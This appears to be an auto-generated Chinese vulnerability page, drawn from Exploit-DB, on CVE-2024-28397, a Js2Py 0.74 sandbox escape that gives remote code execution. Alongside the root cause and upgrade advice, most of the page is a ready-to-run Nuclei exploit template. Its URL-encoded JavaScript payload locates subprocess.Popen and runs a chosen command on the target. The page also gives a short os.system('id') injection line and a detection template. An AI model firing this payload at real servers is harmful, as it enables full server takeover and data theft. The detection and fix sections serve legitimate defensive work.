[webapps] Js2Py 0.74 - RCE
CVE-2024-28397
Js2Py 0.74版本在代码生成中存在沙箱逃逸,导致任意Python代码执行。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2024-28397 |
|---|---|
| 漏洞类型 | 沙箱逃逸RCE |
| 受影响版本 | Js2Py 0.74 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-04-30 |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
Js2Py在将JavaScript代码转换为Python代码时,未能对`__import__`、`eval`、`exec`等危险函数名进行有效过滤,导致攻击者可通过构造特殊的JavaScript代码(如`eval.__proto__`)在生成的Python代码中执行任意Python语句。
🎯 攻击场景
1. 攻击者准备一段包含恶意JavaScript的代码,例如`eval.__proto__.__proto__.__proto__['__import__']('os').system('id')`。 2. 攻击者将此代码作为输入传递给Js2Py库的转换函数(如`js2py.eval_js`)。 3. Js2Py生成对应的Python代码,其中的恶意调用被直接翻译为Python的`__import__`和`system`调用。 4. 最终在服务器上执行了`id`命令,攻击成功。
💥 漏洞影响
远程代码执行(RCE),攻击者可完全控制服务器,执行任意系统命令,导致数据泄露、服务瘫痪或横向移动。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2024-28397-exploit
info:
name: Js2Py <= 0.74 RCE Exploit
author: Ali Sünbül (xeloxa), converted to nuclei template by [Your Name]
severity: critical
description: Exploits CVE-2024-28397 to execute arbitrary commands on the target.
variables:
cmd: "id"
url: "{{BaseURL}}"
http:
- method: POST
path:
- "{{url}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
input=var%20output%20%3D%20%22%22%3Btry%20%7Bvar%20leaked_wrapper%20%3D%20Object.getOwnPropertyNames(%7B%7D)%3Bvar%20object_class%20%3D%20leaked_wrapper.__getattribute__(%22__class__%22).__base__%3Bfunction%20find_popen(cls)%20%7Bvar%20subs%20%3D%20cls.__subclasses__()%3Bfor%20(var%20i%20%3D%200%3B%20i%20%3C%20subs.length%3B%20i%2B%2B)%20%7Bvar%20item%20%3D%20subs%5Bi%5D%3Btry%20%7Bif%20(item.__module__%20%3D%3D%20%22subprocess%22%20%26%26%20item.__name__%20%3D%3D%20%22Popen%22)%20%7Breturn%20item%3B%7D%7Dcatch(e)%20%7B%7Dif%20(item.__name__%20!%3D%20%22type%22)%20%7Btry%20%7Bvar%20result%20%3D%20find_popen(item)%3Bif%20(result)%20return%20result%3B%7Dcatch(e)%20%7B%7D%7D%7Dreturn%20null%3B%7Dvar%20Popen%20%3D%20find_popen(object_class)%3Bif%20(Popen)%20%7Bvar%20res%20%3D%20Popen(%22{{cmd}}%22%2C%20-1%2C%20null%2C%20-1%2C%20-1%2C%20-1%2C%20null%2C%20null%2C%20true).communicate()%3Boutput%20%3D%20res%3B%7D%20else%20%7Boutput%20%3D%20%22Error%3A%20Could%20not%20find%20subprocess.Popen%22%3B%7D%7Dcatch(e)%20%7Boutput%20%3D%20%22Error%22%3B%7Doutput
matchers-condition: and
matchers:
- type: word
part: body
words:
- "uid="
- "root"
- "gid="
condition: or
- type: status
status:
- 200🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2024-28397-detection
info:
name: Js2Py <= 0.74 Sandbox Escape Detection
author: Ali Sünbül (xeloxa), converted to nuclei template by [Your Name]
severity: critical
description: Detects if the target is running a version of Js2Py vulnerable to CVE-2024-28397.
http:
- method: POST
path:
- "{{BaseURL}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
input=var%20output%20%3D%20%22test%22%3Btry%20%7Bvar%20leaked_wrapper%20%3D%20Object.getOwnPropertyNames(%7B%7D)%3Bvar%20object_class%20%3D%20leaked_wrapper.__getattribute__(%22__class__%22).__base__%3Bvar%20subs%20%3D%20object_class.__subclasses__()%3Boutput%20%3D%20%22vulnerable%22%3B%7Dcatch(e)%7Boutput%3De.message%3B%7Doutput
matchers-condition: and
matchers:
- type: word
part: body
words:
- "vulnerable"
- type: status
status:
- 200🛡️ 修复建议
升级至Js2Py 0.75或更高版本,该版本修复了对危险函数名的过滤机制。临时缓解措施:使用沙箱环境隔离Js2Py执行,并限制其网络和文件系统访问。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 05:30 | 来源: Exploit-DB